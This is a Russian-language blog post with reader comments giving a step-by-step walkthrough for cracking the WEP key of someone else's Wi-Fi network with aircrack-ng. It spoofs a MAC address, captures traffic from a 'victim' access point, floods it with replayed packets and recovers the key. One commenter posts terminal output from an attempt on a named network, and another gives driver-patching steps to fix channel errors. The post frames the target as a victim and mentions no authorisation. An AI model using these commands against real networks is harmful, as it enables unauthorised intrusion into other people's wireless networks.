понедельник

Взлом WEP ключа с помощью aircrack-ng в компании с пингвинами

 В этой статье мы с вами рассмотрим..как можно с помощью aircrack-ng заполучить ключ от wi-fi.
Пример был рассмотрен на Ubuntu 10.10.
Итак приступим, для начала нам понадобится сама программа (если ее у вас нет).
Открываем консоль и пишем:
  • sudo apt-get install aircrack-ng
С предложение продолжить мы соглашаемся, далее проверим как работает наша wi-fi карта, пишем в консоле:
  • airmon-ng
 Если наша карточка работает то все гуд)), далее снова печатаем в консоле:
  • airmon-ng stop wlan0
Дальше меняем мак адрес:

  • ifconfig wlan0 down
  • macchanger --mac 00:11:22:33:44:55 wlan0
Дальше стартуем нашу карту в режиме мониторинга: 
  • airmon-ng start wlan0
Дальше включаем мониторинг сетей:
  • airodump-ng mon0
Нас пока интересуют сети с wep шифрованием, итак мы нашли жертву))), пишем в консоле:
  • airodump-ng -c 1 -w crack --bssid 11:11:11:11:11 mon0
-c 1 (сдесь мы ставим канал жертвы)
-w crack (название файла куда будет сохранятся наш мониторинг, я назвал его crack, вы как хотите))
--bssid (сдесь прописываем BSSID нашей жертвы, за пример я поставил 11:11:11:11:11)
 
Мониторинг мы запустили, сейчас надо немного "растормошить" точку))) если она не активна, консоль с мониторингом мы не закрываем, открываем новую и пишем:
  • aireplay-ng -1 -0 -a 11:11:11:11:11 -h 11:22:33:44:55 mon0
После того как мы "перекинулись" парой слов с точкой)) надо наводнить ее пакетами):
  • aireplay-ng -3 -b 11:11:11:11:11 -h 11:22:33:44:55 mon0
Ну вот процесс наводнения пошел, а мы с вами открываем третью консоль и пишем:
  • aircrack-ng -b 11:11:11:11:11 crack-01.cap
Ну вот и все у вас наберется достаточное кол-во пакетов, программа радостно крикнет KEY FOUND!!!
Ну вот и все кому будет не понятно пишите в коментах, постараюсь ответить как можно быстрее)
Всем спасибо за внимание.
© starc0m 

4 комментария:

  1. Я чет не понял эт инструкция для linux'a что ли?
    Хотеось бы для windows'а

    ОтветитьУдалить
  2. Здрвствуйте, спасибо за Ваш пост. С фильтрацие по макам вообще нет проблем!
    А вот с шифрованием возникли проблемы:

    root@wh:~/Dump# airmon-ng start wlan0

    PID Name
    776 NetworkManager
    778 avahi-daemon
    781 avahi-daemon
    1158 wpa_supplicant
    2547 dhclient
    4528 dhclient
    6624 avahi-autoipd
    6625 avahi-autoipd
    Process with PID 2547 (dhclient) is running on interface wlan0
    Process with PID 6624 (avahi-autoipd) is running on interface wlan0
    Process with PID 6625 (avahi-autoipd) is running on interface wlan0
    Process with PID 9461 (airodump-ng) is running on interface mon0
    Process with PID 9469 (airodump-ng) is running on interface mon0


    Interface Chipset Driver

    wlan0 Broadcom b43 - [phy0]
    (monitor mode enabled on mon7)
    mon0 Broadcom b43 - [phy0]
    mon1 Broadcom b43 - [phy0]
    mon2 Broadcom b43 - [phy0]
    mon3 Broadcom b43 - [phy0]
    mon4 Broadcom b43 - [phy0]
    mon5 Broadcom b43 - [phy0]
    mon6 Broadcom b43 - [phy0]

    airodump-ng mon0
    отлично, нашли точку нашли мак, нашли канал и тд
    дальше

    airodump-ng -c 1 -w crack --bssid 11:11:11:11:11 mon0
    побежали пакеты пошла запись
    с другой консоли:


    root@wh:~/Dump# aireplay-ng -1 0 -e Malisheva -b 34:08:04:B7:F3:C6 -s 00:26:5e:64:4d:92 mon0
    No source MAC (-h) specified. Using the device MAC (00:26:5E:64:4D:92)
    17:47:41 Waiting for beacon frame (ESSID: Malisheva) on channel -1
    Found BSSID "34:08:04:B7:F3:C6" to given ESSID "Malisheva".
    17:47:41 mon0 is on channel -1, but the AP uses channel 11

    и как бы все коммнды с aireplay-ng не проходят Ну я подождал часик пакеты записались
    Натравил :
    root@wh:~/Dump# aircrack-ng -b 34:08:04:B7:F3:C6 ./*.cap -w ./
    Opening ./data-01.cap
    Opening ./data-02.cap
    Opening ./data-03.cap
    Opening ./data-04.cap
    Opening ./data-05.cap
    Opening ./data-06.cap
    No valid WPA handshakes found..


    Quitting aircrack-ng...

    как то вот так Думаю что всё таки без aireplay-ng никак не выудить ключ В чём проблема почему aireplay-ng считает что канал -1 а не 11 ? :(
    Спасибо

    ОтветитьУдалить
  3. У кого та же проблема, решается так:
    качаем пакет под свою версию ядра тут:
    http://wireless.kernel.org/en/users/Download/stable/
    после того как скачали распакуем архив.
    зайдем в распакованную папку (в терминале конечно же)
    далее качаем патчи для драйвера.
    Код: [Выделить]
    $ wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch
    $ wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
    применяем их командой:
    Код: [Выделить]
    $ patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
    $ patch -p1 < channel-negative-one-maxim.patch
    выбераем необходимый драйвер для вашей карты.
    Код: [Выделить]
    ./scripts/driver-select ath9k
    где ath9k, это ваш драйвер.
    если не знаете какой ставить драйвер идем по ссылке:
    http://linuxwireless.org/en/users/Drivers
    или смотрим в airmon-ng
    далее
    Код: [Выделить]
    & make
    & make install
    & make wlunload
    & modprobe driver-name
    ну и все. проблемы со сменой канала должны пройти.

    ОтветитьУдалить